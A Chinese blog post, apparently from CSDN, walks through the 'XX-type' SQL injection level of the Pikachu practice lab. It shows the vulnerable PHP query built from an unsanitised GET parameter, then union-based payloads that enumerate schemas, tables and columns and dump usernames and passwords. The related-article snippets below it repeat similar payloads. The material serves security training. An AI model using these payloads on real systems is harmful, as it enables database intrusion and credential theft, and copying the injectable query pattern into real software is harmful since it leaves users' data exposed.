pikachu的XX型注入

最新推荐文章于 2023-07-19 15:46:41 发布
最新推荐文章于 2023-07-19 15:46:41 发布
阅读量1.2k 收藏 5
点赞数 4
分类专栏: pikachu靶机 文章标签: 安全 mysql windows php firefox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50339082/article/details/117908133
版权

pikachu的XX型注入

一、实例讲解:

通过查看源码发现与搜索型类似,但是测试发现拼接闭合的语句不同,查看源码发现是括号闭合,所以可以得到payload的类型是多变的,所以原理方法与搜索型类似,通过构造payload语句来达到注入的目的。但实际渗透测试过程中不可能得到目标网站的源码,这时候就需要根据经验和多测试。比如发现一个输入框,就首先进行单双引号测试aaa” or 1=1# 或者 aaa) or 1=1#等。
源码:

if(isset($_GET['submit']) && $_GET['name']!=null){
    //这里没有做任何处理,直接拼到select里面去了
    $name=$_GET['name'];
    //这里的变量是字符型,需要考虑闭合
    $query="select id,email from member where username=('$name')";
    $result=execute($link, $query);
    if(mysqli_num_rows($result)>=1){
        while($data=mysqli_fetch_assoc($result)){
            $id=$data['id'];
            $email=$data['email'];
            $html.="<p class='notice'>your uid:{$id} <br />your email is: {$email}</p>";
        }
    }else{

        $html.="<p class='notice'>您输入的username不存在,请重新输入!</p>";
    }
}

二、实验步骤:

1、通过构造payload语句发现回显正常,说明此处我们构造的语句已经被正常的传到数据库中,并且参与了数据库的查询运算。

1') or 1=1

在这里插入图片描述
2、然后使用联合查询法判断字段数,将刚才构造的语句中or 1=1替换成order by 1来判断字段发现回显正常,当变成order by 3时我们发现会先报错了,说明此处字段为2。

xx')  order by 1 #

在这里插入图片描述

xx')  order by 3 #

在这里插入图片描述
3、通过联合查询法构造union select 1,2语句来显示字段。

xx') union select 1,2 #

在这里插入图片描述
4、通过联合查询法查询数据库库名。

xx')  union select 1,group_concat(schema_name) from information_schema.schemata #

在这里插入图片描述
5、通过上一步联合查询法我们得到靶场上存在的数据库库名,接下来我们查看一下这个数据库里面存在哪些表。

xx')  union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'#

在这里插入图片描述
6、通过查询pikachu这个数据库发现里面有users表,然后在查看users表里面存在哪些表项。

xx') union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

在这里插入图片描述
7、通过查询users表发现表里存在2个表项分别是username和password,最后分别查看一下这两个表项的内容得到用户名和密码。

xx') union select 1,username from users username #

在这里插入图片描述

xx') union select 1,password from users password #

在这里插入图片描述

weixin_50339082
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入 pikachu post数字注入
08-12
sql注入 pikachu post数字注入
SQL注入之字符注入练习(pikachu
windStudyer的专栏
04-17 3693
SQL注入之字符 实现目标:获取到pikachu下的表、数据信息 靶场:pikachu =》sql-inject=》字符注入 实验步骤 第一步目标:拿到数据库名 确定请求方法类 注:为什么需要确定请求方法??自己思考 尝试输入数据,判断请求方法类 从上可以看出,请求的方法为get类注入点在url上边,我们输入的要查询的值是abc,实际被是通过url参数name带入的。而且参数是字符。 判断注入点 从2.1知道请求方法和注入,因为是字符..
实验9:搜索xx注入
qq_44720671的博客
03-24 2041
搜索xx注入 一、搜索 打开Pikachu中的搜索注入 看似和字符一样,我们可以再看一看后端源代码。 我们可以看到在输入用户名外面又多了两个“%”,但这并不妨碍我们进行破解,道理与字符相同,在用户名后多加个“%“就可以了。 如图: 成功页面为: 二、xx 同样,打开Pikachu中的xx注入 从这个界面也看不出什么,我们可以看一下源代码 我们可以看到在单引号外面,有多...
网络安全pikachu XX注入实战
weixin_44255593的博客
03-09 1307
实例讲解: 通过查看源码发现与搜索类似,但是测试发现拼接闭合的语句不同,查看源码发现是括号闭合,所以可以得到payload的类是多变的,所以原理方法与搜索类似,通过构造payload语句来达到注入的目的。但实际渗透测试过程中不可能得到目标网站的源码,这时候就需要根据经验和多测试。比如发现一个输入框,就首先进行单双引号测试aaa” or 1=1# 或者 aaa) or 1=1#等。 源码: if(isset($_GET['submit']) && $_GET['name']!=nu
pikachu之SQL注入
莫黎小天
06-04 1449
一、数字注入(post传参–需要抓包): 操作如图,用代理在burp suit抓包,并转入repeater 发现存在id,在id那里输入做测试: 简单判断方法: 1' 、 " 、) 、 ')、 ") 是否报错 1' and 1=1 ' and 1=2 判断返回是否有差异 1' or 1=1 ' or 1=2 判断返回是否有差异 注意:还可以进行的操作有: 1.判断语句中的列数,union查询中不能超过全面的列数。 1' order by 3
Pikachu靶场—sql注入通关
oiadkt的博客
03-07 4016
pickchu—sql注入通关
pikachu靶场 暴力破解 sql注入详解
winofkill的博客
12-17 1965
pikachu靶场暴力破解,sql注入详解
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 1826
Pikachu-----Sql Inject(SQL注入
pikachu靶场SQL注入.docx
09-13
pikachu靶场SQL注入章节解题
pikachu.rar
03-05
用于搭建本地测试环境,是一个比较详细的漏洞平台,可用于搭建靶场、进行SQL注入测试,运用于Web安全攻防。
pikachu-master
05-04
pikachu漏洞测试平台搭建
pikachu LINUX安装包,
07-14
上传到根目录,解压直接就问访问,里面有教程
pikachu靶场--SQL inject--数字(post)/字符(get)/搜索/xx注入【4.1】~【4.4】
lmei1228的博客
06-10 674
当我们输入字符的时候,正常情况下,后台会给输入的字符+单引号,把他作为一个整个的字符串来处理,所以我们如果输入的是kobe or 1 = 1,传到后台的时候,or 1 = 1就不会起作用了,因此我们要构造闭合,输入kobe’ or 1 = 1#(#用--替换也可以,都是有着注释的意思,把后面的单引号注释掉),可以看到,它也能实现遍历。首先,打开我们的mysql数据库,use pikachu,然后对表“member”做查询,可以看到当参数为“1”和“1 or 1=1”时,所查询到的结果时大不相同的。
Pikachu靶场:SQL-Inject之xx注入
witwitwiter的博客
04-21 1449
Pikachu靶场:SQL-Inject之xx注入 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 数据库注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击着可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 XX漏洞表示的是 变量 = ('xx')构造闭合的时候要注意括号单引号进行对应 实验步骤 1.注入点探测 在xx注入中看到输入框,在里面输入kobe能够返回uid和emai
SQL注入(二):字符+搜索+ XX+insert/update
NSQ0207的博客
07-19 294
1、使用 ' 进行测试2、使用order by 测试有几个字段3、使用union select 1,2 查看字段。
pikachu字符注入
m0_58887624的博客
11-09 1699
1.字符注入吧。直接就 1' 报错了 2.存在字符注入 3. 1' order by 1# 和 1' order by 2# 返回正常 3时报错。这样就知道了,字段数为2,两列数据 4. 确定一下字段的显示位置嘛。 1' union select 1,2# 5.查一下数据库名 1' union select database(),version()# /**数据库名和版本**/ 只有数据库5.0以上的版本,才会存在i...
pikachu SQL注入xx
ANYOUZHEN的博客
05-09 389
通过后端代码,我们需要构造闭合,写出payload:xx') or 1=1# 成功遍历数据库
pikachu+SQL注入+Burp Suit
qq_54537919的博客
03-11 2343
pikachu+SQL注入+Burp Suit 2.1数字注入(post) 2.2 字符注入(get) 2.3 搜索注入 2.4 XX注入
Pikachu的”insert/update”注入
weixin_50339082的博客
06-15 2181
Pikachu的”insert/update”注入 一、相关函数 UpdateXML(xml_target,xpath_expr,new_xml) #此函数将xml_target中用xpath_expr路径匹配到XML片段用new_xml替换,然后返回更改后的XML。 #xml_target被替换的部分与xpath_expr用户提供的XPath表达式匹配。 #如果找不到表达式匹配 xpath_expr项,或者找到多个匹配项,则该函数返回原始 ml_targetXML片段。 #所有三个参数都应为字符串。 E
pikachu靶场xx注入
最新发布
08-30
pikachu靶场中的XX注入是指在进行数据库注入漏洞测试时,通过查询pikachu数据库中的users表来获取表项的信息。具体步骤如下: 1. 首先,进行注入点的探测,通过使用order by语句来试探查询语句所用的列名个数。 2. 然后,通过查询pikachu数据库发现其中存在users表。 3. 接着,通过构造闭合的方式,使用union select语句来查询users表中的表项信息。例如,可以使用以下语句来查询users表中的列名: - xx') union select 1,group_concat(column_name) from information_schema.columns where table_name='users'# 这个语句中,xx是闭合注入点的符号,group_concat(column_name)用来合并多个列名结果,information_schema.columns用来获取表的列信息,where table_name='users'用来指定查询的是users表。 4. 最后,执行以上查询语句,即可获取到users表中的表项信息。 需要注意的是,在进行构造闭合的时候,要注意使用括号和单引号进行对应,以确保闭合的正确性。 总结起来,pikachu靶场中的XX注入是通过查询pikachu数据库的users表来获取表项信息的一种注入漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Pikachu靶场:SQL-Inject之xx注入](https://blog.csdn.net/witwitwiter/article/details/115939955)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [pikachuXX注入](https://blog.csdn.net/weixin_50339082/article/details/117908133)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值